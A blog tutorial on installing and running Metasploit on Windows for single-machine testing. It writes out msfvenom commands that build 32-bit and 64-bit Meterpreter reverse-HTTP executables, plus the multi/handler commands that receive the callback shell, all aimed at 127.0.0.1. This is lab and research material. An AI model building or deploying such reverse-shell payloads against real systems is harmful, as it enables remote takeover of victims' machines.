In my previous post “Reading Memory Of 64-bit Processes” I used the Windows version of Metasploit so that I could do all tests with a single machine: running the Meterpreter client and server on the same machine.
The Metasploit framework requires administrative rights to install on Windows; by default it installs in the c:\metasploit folder. Your AV on your Windows machine will generate alerts when you install and use Metasploit on Windows, so make sure to create the proper exceptions.
General remark: Metasploit on Windows is slower than on Linux, so be patient.
I use MSFVenom (c:\metasploit\msfvenom.bat) to create 32-bit and 64-bit executables to inject the Meterpreter payload.
Command “msfvenom.bat --help” will show you all options:
Command “msfvenom.bat --list payloads” will show you all payloads:
Command “msfvenom.bat --help-formats” will show you all output formats:
Executable formats will generate programs and scripts, while transform formats will just produce the payload. More on this later.
I use msfvenom.bat to create a 32-bit and 64-bit executable with the meterpreter_reverse_http payload.
Here is the command for 32-bit: “msfvenom.bat --payload windows/meterpreter_reverse_http --format exe --out meterpreter-32.exe LHOST=127.0.0.1”.
Since I did not specify the platform and architecture, msfvenom will choose these based on the payload I selected.
Format exe is the executable format for .exe files.
windows/meterpreter_reverse_http is the Windows 32-bit version of the meterpreter_reverse_http payload. This payload takes several options, which can be enumerated with the following command:
“msfvenom.bat --payload windows/meterpreter_reverse_http --payload-options”
LHOST is the only required option that has no default value. I use LHOST=127.0.0.1 because I’m doing everything on the same machine, so the loopback address can be used.
Here is the command for 64-bit: “msfvenom.bat --payload windows/x64/meterpreter_reverse_http --format exe --out meterpreter-64.exe LHOST=127.0.0.1”.
Now that I created my 2 executables, I can start Metasploit’s console and use them.
I start c:\metasploit\console.bat (this will take a couple of minutes on Windows).
And then I start the Meterpreter server with these commands:
use exploit/multi/handler
set payload windows/meterpreter_reverse_http
set lhost 127.0.0.1
exploit
The Metasploit handler is now waiting for connections. I start meterpreter-64.exe as administrator, because I want it to have SYSTEM access (I ran msfvenom and console as a normal user).
When started, meterpreter-64.exe will connect to the handler and wait for instructions (the process will not exit). We can see this connection here:
With the sessions command, we can see all callbacks:
And here we select session 1 to interact with Meterpreter:
From here on, we can use this Meterpreter shell:


Article Link: https://blog.didierstevens.com/2017/08/14/using-metasploit-on-windows/